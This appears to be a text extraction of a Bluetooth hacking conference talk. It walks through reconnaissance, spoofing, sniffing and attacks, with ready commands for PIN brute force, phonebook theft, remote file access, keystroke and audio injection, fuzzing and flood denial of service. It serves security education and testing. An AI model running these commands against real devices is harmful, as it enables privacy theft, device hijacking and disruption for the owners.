Upload
independent
View
0
Download
0
Embed Size (px)
Citation preview
Bluetooth
● IEEE 802.15.1● Released 1999
● Version 1.0 first release● Standards controlled by Bluetooth SIG
● Low Power / Low Data Rate / Short Range● Ideal for use in place of USB, PS/2, Serial,
Audio Cables, etc● Included in Billions of Devices
● Many of them portable or embedded
Bluetooth Versions
Version Release Updated Features
1.0 1999 Initial release
1.1 2001 Unencrypted options
1.2 2003 FHSS, Rate 721 Kbs
2.0 2004 Rate 2.1 Mbs
2.1 2007 Improved Security
3.0 2009 AMP adds 24 Mbs rate, 802.11 transport
4.0 2010 Low Power, Redefining Protocols
Topology
● Star network topology● Ad-Hoc (Piconet)
● Master / Slave● Master controls the network
– Sets things like clock cycles● Master can have up to 7 slave devices● Slave can only have one Master
● Either device can initial pairing
Security
● Authentication● Initial pairing with a PassKey● Further authentication with Link Key
● Encryption● Traffic encrypted during transit
● Authorization● Varying levels of Trust
Linux Bluetooth Basics
● BlueZ Bluetooth Stack ● Recommend compile from source with flags to
install additional services● Some of the Tools
● Hciconfig - Configure interface settings● Hcitool - Configure connections● Blutoothd - Bluetooth Daemon● Sdptool - Service discovery● Simple-agent - Pairing
Equipment
● Adapter● Parani UD100
● Antenna● Use the same antenna equipment as Wi-Fi
● ChipSet● Cambridge Silicon Radio (CSR)
● Version● Version 2.1 (3.0 and 4.0 starting to come out)
Scanning
● Scan for devices Discoverable Mode● Device listens for remote Inquiries● Device not listening will not respond to scans
# hcitool -i hci0 scan --flush --class
BD Address: E0:F8:47:4D:5E:6F [mode 1, clkoffset 0x5585]
Device name: Bob's Laptop [cached]
Device class: Computer, Laptop (0x3a010c)
Access Profile
● Device Address: unique identifier● Example: 00:11:22:33:44:55
● Class of Device (CoD): 24-bit value● Services: Identifies types of services● Major Device Class: High level of device● Minor Device Class: More granular
● Device Name: Human readable identifier● Example: “Motorola Headset”
Spoofing
● Bluetooth Profile:● Device Address, Device Class, Device Name
● Bluetooth Profile Cloning:● Modify host Bluetooth Adapter profile to match
the profile of another device● Bluetooth Profile Spoofing:
● Creating a misleading profile of host Bluetooth Adapter
SpoofTooph
● Scan local area for devices● Save list of devices found● Select a device from the list to clone
# spooftooph -i hci0 -s -w scan.log
War-Nibbling
BT Device 1: BDADDR 00:05:4F:00:00:00
Class : 0x30040
Name : StreetPilot c550
Seen : 1
Manuf : Private
First : Thu May 10 16:07:50 2012
Last : Thu May 10 16:07:50 2012
Min Pos : Lat 35.997002 Lon 78.909752 Alt 129.585999 Spd 0.000000
Max Pos : Lat 35.997002 Lon 78.909752 Alt 129.585999 Spd 0.000000
Avg Pos : AvgLat 35.997002 AvgLon 78.909752 AvgAlt 129.585900
Service Discovery
● Service Discovery Protocol (SDP)● Lists available services on device
● Service name● L2CAP “port”● RFCOMM “port”
● Generally available without authentication
Service Discovery
# sdptool -i hci0 browse xx:xx:xx:xx:xx:xx...Service Name: File Transfer serverService RecHandle: 0x10000Service Class ID List: "OBEX File Transfer" (0x1106)Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 10 "OBEX" (0x0008)Profile Descriptor List: "OBEX File Transfer" (0x1106) Version: 0x0100
Port Scan
● Find open ports with listening services● Similar to NMAP
● psm_scan ● Scan open L2CAP “ports”
# psm_scan i hci0 s 1 e 101 xx:xx:xx:xx:xx:xx
● rfcomm_scan● Scan open RFCOMM “ports”
# rfcomm_scan i hci0 s 1 e 30 xx:xx:xx:xx:xx:xx
CavitySearch
● *Tool Release*● Streamline the info gathering process● Conduct recon for HCI Info, SDP, L2CAP, and
RFComm● Aggregate into a single log file
CavitySearch
# cavitysearch hci0 11:22:33:44:55:66
Gathering device info into 11_22_33_44_55_66/hciinfo.log ...
Gathering device scan into 11_22_33_44_55_66/scan.log ...
Gathering SDP into 11_22_33_44_55_66/sdp.log ...
Gathering PSMs 1 101 into 11_22_33_44_55_66/psm.log ...
Gathering RFCOMMs 1 30 into 11_22_33_44_55_66/rfcomm.log ...
Generating profile in 11_22_33_44_55_66/profile.log ...
Logs saved in 11_22_33_44_55_66/ directory.
...done.
Bluetooth Identity
Bluetooth Class● Type of Device
– Assist in determining physical device
● List Services– Networking, Telephony, & Object Transfer
Bluetooth Name● Use human name for Social Engineering● Use model name to determine possible attack vectors
Bluetooth Address● Devices are assigned address in blocks● The same models are within a limited range
Bluetooth Profiling Project
● Bluetooth Profiling Project (BlueProPro)● Collect Device Name, Device Address and
Device Class on as many devices as possible● Same idea as Josh Wright's Bnap,Bnap, but
collecting device profiles from others devices instead
● Collected over 1,500 device profiles so far● 1,000 profiles posted as of 07/29/2010
Bluetooth Profiling Project
Percentage of devices names which disclosed sensitive information (out of the 1,500 profiles collected)
First Name
Last Name
Location Device Model
Nickname / Handle
28.17% 18.76% 1.30% 70.54% 1.51%
Sniffing
HCIDump ● Similar to TCPDump to capture traffic on host# hcidump i hci0 R w btdump.cap
Wireshark● View and examine capture# wireshark r btdump.cap
Ubertooth
Kismet● Capture portions of Bluetooth traffic● Find Bluetooth device in local area
Bluetooth_RXTX● Find Bluetooth device in local area● Brute force UAP portion of Device Address
Spescan● Spectrum analysis
Find Non-Discoverable
● Previous Contact● Have prier knowledge of the Device Address
● Labels● Some device print the Device Address on the
box or casing
● Redfang● Scans 248 (232) possible Device Addresses● Takes years
Find Non-Discoverable
● Only need LAP and UAP portions of the device address
● Ubertooth-lap extracts lap# ubertoothlap
● Ubertooth-uap calculates uap# ubertoothuap
Pairing
● Guess PassKey● Commonly PassKeys are 4 digits
– Best chances: 0000, 1234, 9999
# simpleagent hci0 xx:xx:xx:xx:xx RequestPinCode (/org/bluez/2/hci0/dev xx_xx_xx_xx_xx_xx) Enter PIN Code:
Pairing
● Trick User by changing the profile to one the user recognizes
● Post signs requesting connections as advertizing or local information
Pairing
● Chomp● Bluetooth specification attempts to counteract
brute force● Attempts different PassKeys● Changes Device Address between attempts● Provide a file with possible PassKeys
# chomp xx:xx:xx:xx:xx:xx passkeys
Common Services
● File Transfer Profile (FTP)● Object Push Profile (OPP)● Human Interaction Device (HID)● Hands Free (HF)● Personal Area Network (PAN)
OPP
● Specific files like phonebooks and calenders● Bluebugger
– dump phonebook
# bluebugger c 3 a xx:xx:xx:xx:xx:xx phonebook
● Specific tools● Bluesnarfer, btxml, btobex, bloover, helomoto
FTP
● FTP facilitates the exchanging file● Obexfs mounts a remote folder over FTP● Interact like files are stored locally
# mkdir btdir
# obexfs b xx:xx:xx:xx:xx:xx c 3 btdir/
# ls btdir
Passwords.xls Taxes.pdf
HID
● HID is used for various types of human iteration device such as mice and keyboards.
● Inject keystrokes by acting as a keyboard● Stuffkeys
● Keystrokes hard coded● Default “who controls your keystrokes?”
# stuffkeys a xx:xx:xx:xx:xx:xx b yy:yy:yy:yy:yy:yy
HF
● Inject and receive audio● Carwhisperer# hciconfig hci0 voice 0x0060
# carwhisperer i hci0 in.raw out.raw 4
● HSTest# hstest record in.raw xx:xx:xx:xx:xx:xx 4
PAN
● Creates a TCP/IP network over Bluetooth● Interact like it is WiFi or Ethernet
# pand connect xx:xx:xx:xx:xx:xx persist encrypt role=PANU
# ifconfig
...
pan0 Link encap:Ethernet HWaddr yy:yy:yy:yy:yy:yy
...
Fuzzing
● Bluetooth Stack Smasher● Fuzz L2CAP packets● Attempts to crash Bluetooth Stack
– Generates code for suspected crashes● Takes about half an hour to run
# bss –i hci0 s 100 m 12 M 0 xx:xx:xx:xx:xx:xx
vCards
● Virtual Business Card● Adds information to contacts
● BlueJacking● Sending messages by vCard● Set the name field to the message
● Nasty vCard● Send a malformed vCard
# ussppush xx:xx:xx:xx:xx:xx nasty.vcf bob.vcf
DoS
● L2Ping Flood● Send a constant flood of ping packets
# l2ping i hci0 f xx:xx:xx:xx:xx:xx
● vCard Flood● Fill up address book with contacts
# vcblaster c 100 g xx:xx:xx:xx:xx:xx
PwnTooth
● Bundle of Bluetooth attack tools● Designed to automate multiple attacks against
multiple targets.● If a address device is detected in multiple
iterations of scans, the attacks listed in the config file are only run the first time
# pwntooth l logfile.txt s 10
Recap
● Setup ● Configure interface
● Recon● Gather information on device and services
● Connect● Authenticate or connect to open services
● Interact ● Access resources
● Attack● Test reliability through fuzzing and DoS
Q&A
JP DunningTwitter: r0wninEmail: ronin <At> shadowcave <d0t> orgWeb: www.hackfromacave.com